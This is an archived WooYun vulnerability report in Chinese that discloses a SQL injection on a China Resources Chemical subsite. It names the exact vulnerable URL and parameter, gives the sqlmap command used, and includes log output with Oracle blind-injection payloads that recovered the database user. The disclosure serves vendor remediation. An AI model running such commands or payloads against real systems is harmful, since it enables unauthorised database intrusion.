乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-09: 细节已通知厂商并且等待厂商处理中 2015-10-10: 厂商已经确认,细节仅向厂商公开 2015-10-20: 细节向核心白帽子及相关领域专家公开 2015-10-30: 细节向普通白帽子公开 2015-11-09: 细节向实习白帽子公开 2015-11-24: 细节向公众公开
华润化工分站存在SQL注入漏洞
1.注入漏洞页面
http://eip.crcchem.com/page/element/news/more.jsp?eid=4721
2.payload
python.exe sqlmap\sqlmap.py -u "http://eip.crcchem.com/page/element/news/more.jsp?eid=4721" -v 3 --random-agent --dbs --current-user --no-cast --thread 10
3.
sqlmap identified the following injection points with a total of 0 HTTP(s) requsts:---Place: GETParameter: eid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: eid=4721 AND 5245=5245 Vector: AND [INFERENCE]---[10:35:14] [INFO] the back-end DBMS is Oracleweb application technology: JSPback-end DBMS: Oracle[10:35:14] [INFO] fetching current user[10:35:14] [INFO] retrieving the length of query output[10:35:14] [INFO] resumed: 7[10:35:14] [DEBUG] performed 0 queries in 0.00 seconds[10:35:14] [INFO] resumed: ECOLOGY[10:35:14] [DEBUG] performed 0 queries in 0.00 secondscurrent user: 'ECOLOGY'[10:35:14] [WARNING] schema names are going to be used on Oracle for enumeratio as the counterpart to database names on other DBMSes[10:35:14] [INFO] fetching database (schema) names[10:35:14] [INFO] fetching number of databases[10:35:14] [PAYLOAD] 4721 AND ASCII(SUBSTRC((SELECT COUNT(DISTINCT(OWNER)) FROMSYS.ALL_TABLES),1,1))>51[10:35:14] [DEBUG] declared web page charset 'utf-8'[10:35:14] [PAYLOAD] 4721 AND ASCII(SUBSTRC((SELECT COUNT(DISTINCT(OWNER)) FROMSYS.ALL_TABLES),1,1))>48[10:35:14] [PAYLOAD] 4721 AND ASCII(SUBSTRC((SELECT COUNT(DISTINCT(OWNER)) FROMSYS.ALL_TABLES),1,1))>1[10:35:15] [INFO] retrieved:[10:35:15] [DEBUG] performed 3 queries in 0.98 seconds[10:35:15] [WARNING] in case of continuous data retrieval problems you are advied to try a switch '--no-cast' or switch '--hex'[10:35:15] [ERROR] unable to retrieve the number of databases[10:35:15] [INFO] falling back to current database[10:35:15] [INFO] fetching current database[10:35:15] [INFO] retrieving the length of query output[10:35:15] [INFO] resumed: 7[10:35:15] [DEBUG] performed 0 queries in 0.00 seconds[10:35:15] [INFO] resumed: ECOLOGY[10:35:15] [DEBUG] performed 0 queries in 0.02 seconds[10:35:15] [WARNING] on Oracle you'll need to use schema names for enumerations the counterpart to database names on other DBMSesavailable databases [1]:[*] ECOLOGY
1.字符过滤2.删除不需要的页面
危害等级:高
漏洞Rank:12
确认时间:2015-10-10 14:48
感谢提交
暂无